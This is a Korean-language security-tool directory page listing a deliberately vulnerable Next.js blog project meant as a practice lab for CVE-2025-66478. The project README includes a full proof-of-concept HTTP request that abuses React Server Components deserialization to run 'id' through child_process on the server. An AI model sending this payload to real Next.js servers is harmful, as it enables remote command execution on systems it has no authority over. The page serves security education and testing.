Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/letalandroid/cve-2025-66478_rce_vulnerable
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubletalandroid/cve-2025-66478_rce_vulnerable

cve-2025-66478_rce_vulnerable

중요: 교육, 테스트 및 익스플로잇 목적으로만 제작된 VULNERABLE Next JS 프로젝트입니다. 프로덕션에 설치하지 않는 것을 권장하며, 로컬 또는 통제된 환경에서만 사용하십시오.

저장소 보기웹사이트
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

shadcn/ui를 사용한 현대적인 블로그

Next.js 16, React 19, shadcn/ui 및 Tailwind CSS로 구축된 현대적이고 세련된 블로그입니다.

중요:

Next JS VULNERABLE 프로젝트는 교육, 테스트 및 익스플로잇 목적으로만 만들어졌습니다. 프로덕션 환경에는 설치하지 않는 것이 좋으며, 로컬 또는 통제된 환경에서만 사용하세요.

PoC

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Reference: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

특징

  • 🎨 현대적인 디자인: shadcn/ui로 구축된 세련된 인터페이스
  • 📝 전체 블로그: 모의 콘텐츠가 포함된 여러 블로그 게시글
  • 💬 반응 시스템: 다양한 감정(좋아요, 사랑, 웃음, 와우, 슬픔, 화남)으로 게시글에 반응
  • 👤 인증: localStorage를 사용한 회원가입 및 로그인 시스템
  • 🎯 반응형: 완전한 반응형 디자인
  • 🌙 다크 모드: 자동 다크 모드 지원

기술 스택

  • Next.js 16 - React 프레임워크
  • React 19 - UI 라이브러리
  • shadcn/ui - 현대적인 UI 컴포넌트
  • Tailwind CSS 4 - 유틸리티 스타일
  • TypeScript - 정적 타입
  • Lucide React - 아이콘
  • Radix UI - 접근성 있는 컴포넌트

설치

  1. 의존성 설치:
root@kitploit:~
npm install
# o
yarn install
# o
pnpm install
  1. 개발 서버 실행:
root@kitploit:~
npm run dev
# o
yarn dev
# o
pnpm dev
  1. 브라우저에서 http://localhost:3000를 엽니다.

프로젝트 구조

root@kitploit:~
├── app/                    # Next.js 페이지
│   ├── blog/[id]/         # 블로그 상세 페이지
│   ├── profile/            # 프로필 페이지
│   ├── layout.tsx          # 메인 레이아웃
│   └── page.tsx            # 메인 페이지
├── components/             # React 컴포넌트
│   ├── auth/              # 인증 컴포넌트
│   ├── blog/              # 블로그 컴포넌트
│   ├── layout/             # 레이아웃 컴포넌트
│   └── ui/                 # shadcn/ui 컴포넌트
├── lib/                    # 유틸리티 및 서비스
│   ├── auth.ts            # 인증 서비스
│   ├── mocks.ts           # 모의 데이터
│   └── utils.ts           # 일반 유틸리티
└── public/                 # 정적 파일

기능

인증

  • 새 사용자 등록
  • 로그인
  • localStorage 저장
  • 사용자 프로필

블로그

  • 메인 페이지의 게시글 목록
  • 각 게시글의 상세 페이지
  • 작성자 정보
  • 카테고리 및 태그
  • 표지 이미지

반응

  • 게시글의 모든 반응 보기
  • 다양한 감정으로 반응하기
  • 유형별 반응 카운터
  • 반응한 사용자 목록

모의 데이터

모든 데이터(블로그, 사용자, 반응)는 완전히 모의 데이터이며 동적으로 생성됩니다. 데이터베이스가 필요하지 않습니다.

참고 사항

  • 사용자 자격 증명은 localStorage에 저장됩니다.
  • 데이터는 페이지를 새로 고칠 때마다 다시 생성됩니다.
  • 반응 시스템은 시각적 전용입니다(새로운 반응은 지속되지 않습니다).

라이선스

이 프로젝트는 교육 목적으로만 사용됩니다.

도구 다운로드